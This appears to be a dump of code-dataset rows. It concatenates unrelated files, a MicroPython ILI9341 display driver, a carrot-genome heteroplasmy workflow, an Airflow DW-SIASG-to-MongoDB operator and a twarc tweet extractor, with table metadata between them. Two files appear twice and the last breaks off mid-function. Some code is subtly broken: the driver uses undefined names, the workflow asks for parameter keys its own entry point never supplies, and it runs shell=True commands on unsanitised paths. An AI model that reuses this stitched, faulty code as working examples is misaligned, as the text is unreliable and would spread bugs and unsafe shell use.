_SLPOUT = const(0x11) # Sleep Out
_GAMSET = const(0x26) # Gamma Set
_DISPOFF = const(0x28) # Display Off
_DISPON = const(0x29) # Display On
_CASET = const(0x2a) # Column Address Set
_PASET = const(0x2b) # Page Address Set
_RAMWR = const(0x2c) # Memory Write
_RAMRD = const(0x2e) # Memory Read
_MADCTL = const(0x36) # Memory Access Control
_VSCRSADD = const(0x37) # Vertical Scrolling Start Address
_PIXSET = const(0x3a) # Pixel Format Set
_PWCTRLA = const(0xcb) # Power Control A
_PWCRTLB = const(0xcf) # Power Control B
_DTCTRLA = const(0xe8) # Driver Timing Control A
_DTCTRLB = const(0xea) # Driver Timing Control B
_PWRONCTRL = const(0xed) # Power on Sequence Control
_PRCTRL = const(0xf7) # Pump Ratio Control
_PWCTRL1 = const(0xc0) # Power Control 1
_PWCTRL2 = const(0xc1) # Power Control 2
_VMCTRL1 = const(0xc5) # VCOM Control 1
_VMCTRL2 = const(0xc7) # VCOM Control 2
_FRMCTR1 = const(0xb1) # Frame Rate Control 1
_DISCTRL = const(0xb6) # Display Function Control
_ENA3G = const(0xf2) # Enable 3G
_PGAMCTRL = const(0xe0) # Positive Gamma Control
_NGAMCTRL = const(0xe1) # Negative Gamma Control
_CHUNK = const(1024) #maximum number of pixels per spi write
def color565(r, g, b):
return (r & 0xf8) << 8 | (g & 0xfc) << 3 | b >> 3
class ILI9341:
width = 320
height = 240
def __init__(self, spi, cs, dc, rst):
self.spi = spi
self.cs = cs
self.dc = dc
self.rst = rst
self.cs.init(self.cs.OUT, value=1)
self.dc.init(self.dc.OUT, value=0)
self.rst.init(self.rst.OUT, value=0)
self.reset()
self.init()
self._scroll = 0
self._buf = bytearray(_CHUNK * 2)
self._colormap = bytearray(b'\x00\x00\xFF\xFF') #default white foregraound, black background
self._x = 0
self._y = 0
self._font = tt32
self.scrolling = False
def set_color(self,fg,bg):
self._colormap[0] = bg>>8
self._colormap[1] = bg & 255
self._colormap[2] = fg>>8
self._colormap[3] = fg & 255
def set_pos(self,x,y):
self._x = x
self._y = y
def reset_scroll(self):
self.scrolling = False
self._scroll = 0
self.scroll(0)
def set_font(self, font):
self._font = font
def init(self):
for command, data in (
(_RDDSDR, b"\x03\x80\x02"),
(_PWCRTLB, b"\x00\xc1\x30"),
(_PWRONCTRL, b"\x64\x03\x12\x81"),
(_DTCTRLA, b"\x85\x00\x78"),
(_PWCTRLA, b"\x39\x2c\x00\x34\x02"),
(_PRCTRL, b"\x20"),
(_DTCTRLB, b"\x00\x00"),
(_PWCTRL1, b"\x23"),
(_PWCTRL2, b"\x10"),
(_VMCTRL1, b"\x3e\x28"),
(_VMCTRL2, b"\x86"),
#(_MADCTL, b"\x48"),
(_MADCTL, b"\x08"),
(_PIXSET, b"\x55"),
(_FRMCTR1, b"\x00\x18"),
(_DISCTRL, b"\x08\x82\x27"),
(_ENA3G, b"\x00"),
(_GAMSET, b"\x01"),
(_PGAMCTRL, b"\x0f\x31\x2b\x0c\x0e\x08\x4e\xf1\x37\x07\x10\x03\x0e\x09\x00"),
(_NGAMCTRL, b"\x00\x0e\x14\x03\x11\x07\x31\xc1\x48\x08\x0f\x0c\x31\x36\x0f")):
self._write(command, data)
self._write(_SLPOUT)
time.sleep_ms(120)
self._write(_DISPON)
def reset(self):
self.rst(0)
time.sleep_ms(50)
self.rst(1)
time.sleep_ms(50)
def _write(self, command, data=None):
self.dc(0)
self.cs(0)
self.spi.write(bytearray([command]))
self.cs(1)
if data is not None:
self._data(data)
def _data(self, data):
self.dc(1)
self.cs(0)
self.spi.write(data)
self.cs(1)
def _writeblock(self, x0, y0, x1, y1, data=None):
self._write(_CASET, ustruct.pack(">HH", x0, x1))
self._write(_PASET, ustruct.pack(">HH", y0, y1))
self._write(_RAMWR, data)
def _readblock(self, x0, y0, x1, y1):
self._write(_CASET, ustruct.pack(">HH", x0, x1))
self._write(_PASET, ustruct.pack(">HH", y0, y1))
if data is None:
return self._read(_RAMRD, (x1 - x0 + 1) * (y1 - y0 + 1) * 3)
def _read(self, command, count):
self.dc(0)
self.cs(0)
self.spi.write(bytearray([command]))
data = self.spi.read(count)
self.cs(1)
return data
def pixel(self, x, y, color=None):
if color is None:
r, b, g = self._readblock(x, y, x, y)
return color565(r, g, b)
if not 0 <= x < self.width or not 0 <= y < self.height:
return
self._writeblock(x, y, x, y, ustruct.pack(">H", color))
def fill_rectangle(self, x, y, w, h, color=None):
x = min(self.width - 1, max(0, x))
y = min(self.height - 1, max(0, y))
w = min(self.width - x, max(1, w))
h = min(self.height - y, max(1, h))
if color:
color = ustruct.pack(">H", color)
else:
color = self._colormap[0:2] #background
for i in range(_CHUNK):
self._buf[2*i]=color[0]; self._buf[2*i+1]=color[1]
chunks, rest = divmod(w * h, _CHUNK)
self._writeblock(x, y, x + w - 1, y + h - 1, None)
if chunks:
for count in range(chunks):
self._data(self._buf)
if rest != 0:
mv = memoryview(self._buf)
self._data(mv[:rest*2])
def erase(self):
self.fill_rectangle(0, 0, self.width, self.height)
def blit(self, bitbuff, x, y, w, h):
x = min(self.width - 1, max(0, x))
y = min(self.height - 1, max(0, y))
w = min(self.width - x, max(1, w))
h = min(self.height - y, max(1, h))
chunks, rest = divmod(w * h, _CHUNK)
self._writeblock(x, y, x + w - 1, y + h - 1, None)
written = 0
for iy in range(h):
for ix in range(w):
index = ix+iy*w - written
if index >=_CHUNK:
self._data(self._buf)
written += _CHUNK
index -= _CHUNK
c = bitbuff.pixel(ix,iy)
self._buf[index*2] = self._colormap[c*2]
self._buf[index*2+1] = self._colormap[c*2+1]
rest = w*h - written
if rest != 0:
mv = memoryview(self._buf)
self._data(mv[:rest*2])
def chars(self, str, x, y):
str_w = self._font.get_width(str)
div, rem = divmod(self._font.height(),8)
nbytes = div+1 if rem else div
buf = bytearray(str_w * nbytes)
pos = 0
for ch in str:
glyph, char_w = self._font.get_ch(ch)
for row in range(nbytes):
index = row*str_w + pos
for i in range(char_w):
buf[index+i] = glyph[nbytes*i+row]
pos += char_w
fb = framebuf.FrameBuffer(buf,str_w, self._font.height(), framebuf.MONO_VLSB)
self.blit(fb,x,y,str_w,self._font.height())
return x+str_w
def scroll(self, dy):
self._scroll = (self._scroll + dy) % self.height
self._write(_VSCRSADD, ustruct.pack(">H", self._scroll))
def next_line(self, cury, char_h):
global scrolling
if not self.scrolling:
res = cury + char_h
self.scrolling = (res >= self.height)
if self.scrolling:
self.scroll(char_h)
res = (self.height - char_h + self._scroll)%self.height
self.fill_rectangle(0, res, self.width, self._font.height())
return res
def write(self, text): #does character wrap, compatible with stream output
curx = self._x; cury = self._y
char_h = self._font.height()
width = 0
written = 0
for pos, ch in enumerate(text):
if ch == '\n':
if pos>0:
self.chars(text[written:pos],curx,cury)
curx = 0; written = pos+1; width = 0
cury = self.next_line(cury,char_h)
else:
char_w = self._font.get_width(ch)
if curx + width + char_w >= self.width:
self.chars(text[written:pos], curx,cury)
curx = 0 ; written = pos; width = char_h
cury = self.next_line(cury,char_h)
else:
width += char_w
if written<len(text):
curx = self.chars(text[written:], curx,cury)
self._x = curx; self._y = cury
def print(self, text): #does word wrap, leaves self._x unchanged
cury = self._y; curx = self._x
char_h = self._font.height()
char_w = self._font.max_width()
lines = text.split('\n')
for line in lines:
words = line.split(' ')
for word in words:
if curx + self._font.get_width(word) >= self.width:
curx = self._x; cury = self.next_line(cury,char_h)
while self._font.get_width(word) > self.width:
self.chars(word[:self.width//char_w],curx,cury)
word = word[self.width//char_w:]
cury = self.next_line(cury,char_h)
if len(word)>0:
curx = self.chars(word+' ', curx,cury)
curx = self._x; cury = self.next_line(cury,char_h)
self._y = cury | pt | 0.141695 | 2.344998 | 2 |
code/workflow/run_hpc_het.py | vtphan/HeteroplasmyWorkflow | 1 | 13570 | import subprocess
import os
import sys
import datetime
import random
from configparser import ConfigParser
from datetime import datetime
import s03_heteroplasmy_likelihood, s04_sort_candidates, s05_select_sites, s06_location_conservation
import multiprocessing
def check_exist(cmd, thing):
try:
subprocess.check_output('%s %s' % (cmd, thing), shell=True)
except subprocess.CalledProcessError:
print("Error: did not find %s in path." % thing)
sys.exit(0)
def log_error(cmd, exec_output, exec_error, LOG_FILE):
with open(LOG_FILE, 'a') as f:
f.write('time: %s\ncmd: %s\noutput: %s\nexec error:%s\n' % (str(datetime.now()), cmd, exec_output, exec_error))
def log_final(no_error, argv):
log_output = os.path.join(SCRIPT_DIR, 'log_align_analyze_sort.txt')
with open(log_output, 'a') as f:
f.write('%s %s %s %s\n' % (no_error, argv[0], argv[1], str(datetime.now())))
def process(params):
ref = params['ref']
annotation = params['annotation']
dist = params['dist']
read_file = params['read_file']
out_html_name = params['out_html_name']
random_id = params['random_id']
READS_DIR = params['read_dir']
OUTPUT_DIR = params['output_dir']
LOG_FILE = params['log_file']
alignment_quality = params['alignment_quality']
score_threshold = params['score_threshold']
percentage_threshold = params['percentage_threshold']
# print(ref)
# print(annotation)
# print(dist)
# print(read_file)
# print(READS_DIR)
# print(OUTPUT_DIR)
# print(LOG_FILE)
# print(alignment_quality)
# print(score_threshold)
# print(percentage_threshold)
# read version
with open('VERSION','r') as f:
line = f.readline()
version = float(line.strip())
# #--------------------------------------------------------------
SCRIPT_DIR = os.getcwd()
print("\nComputing scores")
# print("Version: "+str(version))
output = 'None'
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
###########################################################
# 03_compute_heteroplasmy likelihood
# 04_sort_sites
###########################################################
check_exist('ls', annotation)
csv_dir = os.path.join(OUTPUT_DIR, "csv")
if not os.path.exists(csv_dir):
os.makedirs(csv_dir)
print("Compute heteroplasmy likelihood")
P = multiprocessing.Pool()
jobs = []
with open(read_file, 'r') as f:
for line in f:
read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
name = read1.split('/')[-1].split('_R1')[0]
# name = line.strip()
out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
out_filtered_sam = os.path.join(OUTPUT_DIR, name+'_f2_F0x900_q'+alignment_quality+'.sam')
no_error = True
output = 'None'
kw = {
'ref': ref,
'out_filtered_sam': out_filtered_sam,
'annotation': annotation,
'out_csv': out_csv,
}
jobs.append(P.apply_async(s03_heteroplasmy_likelihood.process, (), kw))
P.close()
P.join()
# Sort score
P = multiprocessing.Pool()
jobs = []
with open(read_file, 'r') as f:
for line in f:
read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
name = read1.split('/')[-1].split('_R1')[0]
# name = line.strip()
out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
kw2 = {
'out_csv': out_csv
}
jobs.append(P.apply_async(s04_sort_candidates.process, (), kw2))
P.close()
P.join()
print ('Finished computing heteroplasmy scores.\n')
###########################################################
# 05_select_sites
###########################################################
print('Select heteroplasmy sites.')
# run select_sites.py
result_dir = os.path.join(OUTPUT_DIR,"Result")
if not os.path.exists(result_dir):
os.makedirs(result_dir)
organellar_type = None
if 'chloroplast' in out_html_name:
organellar_type = 'chloroplast'
if 'mitochondria' in out_html_name:
organellar_type = 'mitochondria'
select_sites_inputs = {
'csv_dir' : csv_dir,
'score_threshold': score_threshold,
'percentage_threshold': percentage_threshold,
'name_list' : None,
'organellar_type': organellar_type,
'result_dir': result_dir
}
het_file = s05_select_sites.process(select_sites_inputs)
###########################################################
# 06_compute_site_conservation
###########################################################
# run location_conservation.py
print('\nCompute site conservation.')
cp_conserved = None
if organellar_type == 'chloroplast':
cp_conserved = os.path.join(result_dir, "chloroplast_conserved_"+dist+".csv")
if organellar_type == 'mitochondria':
cp_conserved = os.path.join(result_dir, "mitochondria_conserved_"+dist+".csv")
location_conservation_inputs = {
'het_file': het_file,
'func': dist,
'output': cp_conserved
}
s06_location_conservation.main(location_conservation_inputs)
###########################################################
# 07_plot
###########################################################
# run plot_heteroplasmy.py
print('\nPlot heteroplasmies.')
plot_heteroplasmy = os.path.join(SCRIPT_DIR, 's07_plot_heteroplasmy.py')
check_exist('ls',plot_heteroplasmy)
# genome_name = '"Daucus carota chloroplast genome"'
if organellar_type == 'chloroplast':
genome_name = '"Daucus carota chloroplast genome"'
if organellar_type == 'mitochondria':
genome_name = '"Daucus carota mitochondrial genome"'
out_html = os.path.join(OUTPUT_DIR, out_html_name)
cmd = 'python %s %s %s %s %s %s' %(plot_heteroplasmy, genome_name, annotation, het_file, cp_conserved, out_html)
print(cmd)
print()
try:
output = subprocess.check_call(cmd, shell=True)
except:
no_error = False
log_error(cmd, output, sys.exc_info(), LOG_FILE)
print("\nSuccess!\n")
print("Vizualization file : ", out_html)
if __name__ == '__main__':
if len(sys.argv) != 13:
print('Usage: python', sys.argv[0], 'ref', 'annotation', 'dist', 'read_file', 'output.html', 'random_id', 'READS_DIR', 'output_dir', 'log_file', 'alignment_quality', 'score_threshold', 'percentage_threshold')
sys.exit(0)
params = {
'ref': sys.argv[1],
'annotation': sys.argv[2],
'dist': sys.argv[3],
'read_file': sys.argv[4],
'out_html_name': sys.argv[5],
'random_id': sys.argv[6],
'READS_DIR': sys.argv[7],
'OUTPUT_DIR': sys.argv[8],
'LOG_FILE': sys.argv[9],
'alignment_quality': sys.argv[10],
'score_threshold': sys.argv[11],
'percentage_threshold': sys.argv[12],
}
process(params)
| import subprocess
import os
import sys
import datetime
import random
from configparser import ConfigParser
from datetime import datetime
import s03_heteroplasmy_likelihood, s04_sort_candidates, s05_select_sites, s06_location_conservation
import multiprocessing
def check_exist(cmd, thing):
try:
subprocess.check_output('%s %s' % (cmd, thing), shell=True)
except subprocess.CalledProcessError:
print("Error: did not find %s in path." % thing)
sys.exit(0)
def log_error(cmd, exec_output, exec_error, LOG_FILE):
with open(LOG_FILE, 'a') as f:
f.write('time: %s\ncmd: %s\noutput: %s\nexec error:%s\n' % (str(datetime.now()), cmd, exec_output, exec_error))
def log_final(no_error, argv):
log_output = os.path.join(SCRIPT_DIR, 'log_align_analyze_sort.txt')
with open(log_output, 'a') as f:
f.write('%s %s %s %s\n' % (no_error, argv[0], argv[1], str(datetime.now())))
def process(params):
ref = params['ref']
annotation = params['annotation']
dist = params['dist']
read_file = params['read_file']
out_html_name = params['out_html_name']
random_id = params['random_id']
READS_DIR = params['read_dir']
OUTPUT_DIR = params['output_dir']
LOG_FILE = params['log_file']
alignment_quality = params['alignment_quality']
score_threshold = params['score_threshold']
percentage_threshold = params['percentage_threshold']
# print(ref)
# print(annotation)
# print(dist)
# print(read_file)
# print(READS_DIR)
# print(OUTPUT_DIR)
# print(LOG_FILE)
# print(alignment_quality)
# print(score_threshold)
# print(percentage_threshold)
# read version
with open('VERSION','r') as f:
line = f.readline()
version = float(line.strip())
# #--------------------------------------------------------------
SCRIPT_DIR = os.getcwd()
print("\nComputing scores")
# print("Version: "+str(version))
output = 'None'
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
###########################################################
# 03_compute_heteroplasmy likelihood
# 04_sort_sites
###########################################################
check_exist('ls', annotation)
csv_dir = os.path.join(OUTPUT_DIR, "csv")
if not os.path.exists(csv_dir):
os.makedirs(csv_dir)
print("Compute heteroplasmy likelihood")
P = multiprocessing.Pool()
jobs = []
with open(read_file, 'r') as f:
for line in f:
read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
name = read1.split('/')[-1].split('_R1')[0]
# name = line.strip()
out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
out_filtered_sam = os.path.join(OUTPUT_DIR, name+'_f2_F0x900_q'+alignment_quality+'.sam')
no_error = True
output = 'None'
kw = {
'ref': ref,
'out_filtered_sam': out_filtered_sam,
'annotation': annotation,
'out_csv': out_csv,
}
jobs.append(P.apply_async(s03_heteroplasmy_likelihood.process, (), kw))
P.close()
P.join()
# Sort score
P = multiprocessing.Pool()
jobs = []
with open(read_file, 'r') as f:
for line in f:
read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
name = read1.split('/')[-1].split('_R1')[0]
# name = line.strip()
out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
kw2 = {
'out_csv': out_csv
}
jobs.append(P.apply_async(s04_sort_candidates.process, (), kw2))
P.close()
P.join()
print ('Finished computing heteroplasmy scores.\n')
###########################################################
# 05_select_sites
###########################################################
print('Select heteroplasmy sites.')
# run select_sites.py
result_dir = os.path.join(OUTPUT_DIR,"Result")
if not os.path.exists(result_dir):
os.makedirs(result_dir)
organellar_type = None
if 'chloroplast' in out_html_name:
organellar_type = 'chloroplast'
if 'mitochondria' in out_html_name:
organellar_type = 'mitochondria'
select_sites_inputs = {
'csv_dir' : csv_dir,
'score_threshold': score_threshold,
'percentage_threshold': percentage_threshold,
'name_list' : None,
'organellar_type': organellar_type,
'result_dir': result_dir
}
het_file = s05_select_sites.process(select_sites_inputs)
###########################################################
# 06_compute_site_conservation
###########################################################
# run location_conservation.py
print('\nCompute site conservation.')
cp_conserved = None
if organellar_type == 'chloroplast':
cp_conserved = os.path.join(result_dir, "chloroplast_conserved_"+dist+".csv")
if organellar_type == 'mitochondria':
cp_conserved = os.path.join(result_dir, "mitochondria_conserved_"+dist+".csv")
location_conservation_inputs = {
'het_file': het_file,
'func': dist,
'output': cp_conserved
}
s06_location_conservation.main(location_conservation_inputs)
###########################################################
# 07_plot
###########################################################
# run plot_heteroplasmy.py
print('\nPlot heteroplasmies.')
plot_heteroplasmy = os.path.join(SCRIPT_DIR, 's07_plot_heteroplasmy.py')
check_exist('ls',plot_heteroplasmy)
# genome_name = '"Daucus carota chloroplast genome"'
if organellar_type == 'chloroplast':
genome_name = '"Daucus carota chloroplast genome"'
if organellar_type == 'mitochondria':
genome_name = '"Daucus carota mitochondrial genome"'
out_html = os.path.join(OUTPUT_DIR, out_html_name)
cmd = 'python %s %s %s %s %s %s' %(plot_heteroplasmy, genome_name, annotation, het_file, cp_conserved, out_html)
print(cmd)
print()
try:
output = subprocess.check_call(cmd, shell=True)
except:
no_error = False
log_error(cmd, output, sys.exc_info(), LOG_FILE)
print("\nSuccess!\n")
print("Vizualization file : ", out_html)
if __name__ == '__main__':
if len(sys.argv) != 13:
print('Usage: python', sys.argv[0], 'ref', 'annotation', 'dist', 'read_file', 'output.html', 'random_id', 'READS_DIR', 'output_dir', 'log_file', 'alignment_quality', 'score_threshold', 'percentage_threshold')
sys.exit(0)
params = {
'ref': sys.argv[1],
'annotation': sys.argv[2],
'dist': sys.argv[3],
'read_file': sys.argv[4],
'out_html_name': sys.argv[5],
'random_id': sys.argv[6],
'READS_DIR': sys.argv[7],
'OUTPUT_DIR': sys.argv[8],
'LOG_FILE': sys.argv[9],
'alignment_quality': sys.argv[10],
'score_threshold': sys.argv[11],
'percentage_threshold': sys.argv[12],
}
process(params)
| it | 0.291593 | 2.239021 | 2 |
airflow/providers/siasg/dw/transfers/relatorio_para_mongo.py | CarlosAdp/airflow-providers-siasg | 1 | 13571 | from datetime import datetime
from typing import Any, List
import json
import tempfile
from airflow.models.baseoperator import BaseOperator
from airflow.providers.mongo.hooks.mongo import MongoHook
import pandas
from airflow.providers.siasg.dw.hooks.dw import DWSIASGHook
class DWSIASGRelatorioParaMongoOperator(BaseOperator):
'''Baixa um relatório do DW-SIASG para um banco Mongo
:param id_conexao: id pra conexão do tipo "dw_siasg"
:type id_conexao: str
:param id_relatorio: id do relatório no DW-SIASG
:type id_relatorio: str
:param id_conexao_mongo: id para conexão do tipo "mongo"
:type id_conexao_mongo
:param banco: Nome do banco
:type banco: str
:param colecao: Nome da coleção
:type colecao: str
:param repostas_prompts: lista de respostas para prompts do relatório
:type repostas_prompts: List[str]
:param timeout_segundos_segundos: tempo máximo de espera em segundos
:type timeout_segundos_segundos: int, opcional
:param truncar_colecao: `True` se coleção deve ser truncada antes da
inserção e `False` caso contrário
:type truncar_colecao: bool
'''
template_fields = [
'id_relatorio', 'respostas_prompts', 'banco', 'colecao'
]
id_conexao: str
id_relatorio: str
respostas_prompts: List[str]
timeout_segundos: int
id_conexao_mongo: str
banco: str
colecao: str
truncar_colecao: bool
def __init__(
self,
id_conexao: str,
id_relatorio: str,
id_conexao_mongo: str,
banco: str = None,
colecao: str = 'test',
respostas_prompts: List[str] = None,
timeout_segundos: int = 60,
truncar_colecao: bool = False,
**kwargs
) -> None:
super().__init__(**kwargs)
self.id_conexao = id_conexao
self.id_relatorio = id_relatorio
self.respostas_prompts = respostas_prompts
self.timeout_segundos = timeout_segundos
self.id_conexao_mongo = id_conexao_mongo
self.banco = banco
self.colecao = colecao
self.truncar_colecao = truncar_colecao
def execute(self, context: Any) -> None:
self.log.info(
'Baixando relatório "%s" para coleção do mongo "%s" com as '
'seguintes respostas para prompts: "%s"%s',
self.id_relatorio, self.colecao, self.respostas_prompts,
'. Truncando coleção' if self.truncar_colecao else ''
)
respostas_prompts = json.loads(self.respostas_prompts) \
if isinstance(self.respostas_prompts, str) \
else self.respostas_prompts
with tempfile.NamedTemporaryFile(mode='wb') as arquivo:
instante = datetime.now()
with DWSIASGHook(self.id_conexao) as hook:
local, _ = hook.baixa_para_excel(
self.id_relatorio, arquivo.name, respostas_prompts,
self.timeout_segundos
)
df = pandas.read_excel(local)
df.columns = df.columns.str.replace('.', '', regex=False)
df['Timestamp'] = instante
with MongoHook(self.id_conexao_mongo) as hook:
if self.truncar_colecao:
hook.delete_many(self.colecao, {}, self.banco)
if len(df) > 0:
inseridos = hook.insert_many(
self.colecao, df.to_dict('records'), self.banco
).inserted_ids
else:
inseridos = []
self.log.info(
'Relatório transferido com sucesso, tendo produzido %s registros',
len(inseridos)
)
self.xcom_push(context, 'registros_inseridos', len(inseridos))
| from datetime import datetime
from typing import Any, List
import json
import tempfile
from airflow.models.baseoperator import BaseOperator
from airflow.providers.mongo.hooks.mongo import MongoHook
import pandas
from airflow.providers.siasg.dw.hooks.dw import DWSIASGHook
class DWSIASGRelatorioParaMongoOperator(BaseOperator):
'''Baixa um relatório do DW-SIASG para um banco Mongo
:param id_conexao: id pra conexão do tipo "dw_siasg"
:type id_conexao: str
:param id_relatorio: id do relatório no DW-SIASG
:type id_relatorio: str
:param id_conexao_mongo: id para conexão do tipo "mongo"
:type id_conexao_mongo
:param banco: Nome do banco
:type banco: str
:param colecao: Nome da coleção
:type colecao: str
:param repostas_prompts: lista de respostas para prompts do relatório
:type repostas_prompts: List[str]
:param timeout_segundos_segundos: tempo máximo de espera em segundos
:type timeout_segundos_segundos: int, opcional
:param truncar_colecao: `True` se coleção deve ser truncada antes da
inserção e `False` caso contrário
:type truncar_colecao: bool
'''
template_fields = [
'id_relatorio', 'respostas_prompts', 'banco', 'colecao'
]
id_conexao: str
id_relatorio: str
respostas_prompts: List[str]
timeout_segundos: int
id_conexao_mongo: str
banco: str
colecao: str
truncar_colecao: bool
def __init__(
self,
id_conexao: str,
id_relatorio: str,
id_conexao_mongo: str,
banco: str = None,
colecao: str = 'test',
respostas_prompts: List[str] = None,
timeout_segundos: int = 60,
truncar_colecao: bool = False,
**kwargs
) -> None:
super().__init__(**kwargs)
self.id_conexao = id_conexao
self.id_relatorio = id_relatorio
self.respostas_prompts = respostas_prompts
self.timeout_segundos = timeout_segundos
self.id_conexao_mongo = id_conexao_mongo
self.banco = banco
self.colecao = colecao
self.truncar_colecao = truncar_colecao
def execute(self, context: Any) -> None:
self.log.info(
'Baixando relatório "%s" para coleção do mongo "%s" com as '
'seguintes respostas para prompts: "%s"%s',
self.id_relatorio, self.colecao, self.respostas_prompts,
'. Truncando coleção' if self.truncar_colecao else ''
)
respostas_prompts = json.loads(self.respostas_prompts) \
if isinstance(self.respostas_prompts, str) \
else self.respostas_prompts
with tempfile.NamedTemporaryFile(mode='wb') as arquivo:
instante = datetime.now()
with DWSIASGHook(self.id_conexao) as hook:
local, _ = hook.baixa_para_excel(
self.id_relatorio, arquivo.name, respostas_prompts,
self.timeout_segundos
)
df = pandas.read_excel(local)
df.columns = df.columns.str.replace('.', '', regex=False)
df['Timestamp'] = instante
with MongoHook(self.id_conexao_mongo) as hook:
if self.truncar_colecao:
hook.delete_many(self.colecao, {}, self.banco)
if len(df) > 0:
inseridos = hook.insert_many(
self.colecao, df.to_dict('records'), self.banco
).inserted_ids
else:
inseridos = []
self.log.info(
'Relatório transferido com sucesso, tendo produzido %s registros',
len(inseridos)
)
self.xcom_push(context, 'registros_inseridos', len(inseridos))
| pt | 0.22384 | 2.270876 | 2 |
utils/extractor.py | nwoodward/twarc | 20 | 13572 | <reponame>nwoodward/twarc
#!/usr/bin/env python3
from datetime import datetime
import json
import os
import re
import argparse
import csv
import copy
import sys
import gzip
strptime = datetime.strptime
class attriObject:
"""Class object for attribute parser."""
def __init__(self, string):
self.value = re.split(":", string)
self.title = self.value[-1]
def getElement(self, json_object):
found = [json_object]
for entry in self.value:
for index in range(len(found)):
try:
found[index] = found[index][entry]
except (TypeError, KeyError):
print("'{0}' is not a valid json entry.".format(":".join(self.value)))
sys.exit()
#If single search object is a list, search entire list. Error if nested lists.
if isinstance(found[index], list):
if len(found) > 1:
raise Exception("Extractor currently does not handle nested lists.")
found = found[index]
return found
def tweets_files(string, path):
"""Iterates over json files in path."""
for filename in os.listdir(path):
if re.match(string, filename) and ".jsonl" in filename:
f = gzip.open if ".gz" in filename else open
yield path + filename, f
Ellipsis
def parse(args):
with open(args.output, 'w+', encoding="utf-8") as output:
csv_writer = csv.writer(output, dialect=args.dialect)
csv_writer.writerow([a.title for a in args.attributes])
count = 0
tweets = set()
for filename, f in tweets_files(args.string, args.path):
print("parsing", filename)
with f(filename, 'rb') as data_file:
for line in data_file:
try:
json_object = json.loads(line.decode("utf-8"))
except ValueError:
print("Error in", filename, "entry incomplete.")
continue
#Check for duplicates
identity = json_object['id']
if identity in tweets:
continue
tweets.add(identity)
#Check for time restrictions.
if args.start or args.end:
tweet_time = strptime(json_object['created_at'],'%a %b %d %H:%M:%S +0000 %Y')
if args.start and args.start > tweet_time:
continue
if args.end and args.end < tweet_time:
continue
#Check for hashtag.
if args.hashtag:
for entity in json_object['entities']["hashtags"]:
if entity['text'].lower() == args.hashtag:
break
else:
continue
count += extract(json_object, args, csv_writer)
print("Searched", len(tweets), "tweets and recorded", count, "items.")
print("largest id:", max(tweets))
def extract(json_object, args, csv_writer):
"""Extract and write found attributes."""
found = [[]]
for attribute in args.attributes:
item = attribute.getElement(json_object)
if len(item) == 0:
for row in found:
row.append("NA")
else:
found1 = []
for value in item:
if value is None:
value = "NA"
new = copy.deepcopy(found)
for row in new:
row.append(value)
found1.extend(new)
found = found1
for row in found:
csv_writer.writerow(row)
return len(found)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Extracts attributes from tweets.')
parser.add_argument("attributes", nargs='*', help="Attributes to search for. Attributes inside nested inside other attributes should be seperated by a colon. Example: user:screen_name, entities:hashtags:text.")
parser.add_argument("-dialect", default="excel", help="Sets dialect for csv output. Defaults to excel. See python module csv.list_dialects()")
parser.add_argument("-string", default="", help="Regular expression for files to parse. Defaults to empty string.")
parser.add_argument("-path", default="./", help="Optional path to folder containing tweets. Defaults to current folder.")
parser.add_argument("-output", default="output.csv", help="Optional file to output results. Defaults to output.csv.")
parser.add_argument("-start", default="", help="Define start date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-end", default="", help="Define end date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-hashtag", default="", help="Define a hashtag that must be in parsed tweets.")
args = parser.parse_args()
if not args.path.endswith("/"):
args.path += "/"
args.start = strptime(args.start, '%m:%d:%Y') if args.start else False
args.end = strptime(args.end, '%m:%d:%Y') if args.end else False
args.attributes = [attriObject(i) for i in args.attributes]
args.string = re.compile(args.string)
args.hashtag = args.hashtag.lower()
parse(args)
| #!/usr/bin/env python3
from datetime import datetime
import json
import os
import re
import argparse
import csv
import copy
import sys
import gzip
strptime = datetime.strptime
class attriObject:
"""Class object for attribute parser."""
def __init__(self, string):
self.value = re.split(":", string)
self.title = self.value[-1]
def getElement(self, json_object):
found = [json_object]
for entry in self.value:
for index in range(len(found)):
try:
found[index] = found[index][entry]
except (TypeError, KeyError):
print("'{0}' is not a valid json entry.".format(":".join(self.value)))
sys.exit()
#If single search object is a list, search entire list. Error if nested lists.
if isinstance(found[index], list):
if len(found) > 1:
raise Exception("Extractor currently does not handle nested lists.")
found = found[index]
return found
def tweets_files(string, path):
"""Iterates over json files in path."""
for filename in os.listdir(path):
if re.match(string, filename) and ".jsonl" in filename:
f = gzip.open if ".gz" in filename else open
yield path + filename, f
Ellipsis
def parse(args):
with open(args.output, 'w+', encoding="utf-8") as output:
csv_writer = csv.writer(output, dialect=args.dialect)
csv_writer.writerow([a.title for a in args.attributes])
count = 0
tweets = set()
for filename, f in tweets_files(args.string, args.path):
print("parsing", filename)
with f(filename, 'rb') as data_file:
for line in data_file:
try:
json_object = json.loads(line.decode("utf-8"))
except ValueError:
print("Error in", filename, "entry incomplete.")
continue
#Check for duplicates
identity = json_object['id']
if identity in tweets:
continue
tweets.add(identity)
#Check for time restrictions.
if args.start or args.end:
tweet_time = strptime(json_object['created_at'],'%a %b %d %H:%M:%S +0000 %Y')
if args.start and args.start > tweet_time:
continue
if args.end and args.end < tweet_time:
continue
#Check for hashtag.
if args.hashtag:
for entity in json_object['entities']["hashtags"]:
if entity['text'].lower() == args.hashtag:
break
else:
continue
count += extract(json_object, args, csv_writer)
print("Searched", len(tweets), "tweets and recorded", count, "items.")
print("largest id:", max(tweets))
def extract(json_object, args, csv_writer):
"""Extract and write found attributes."""
found = [[]]
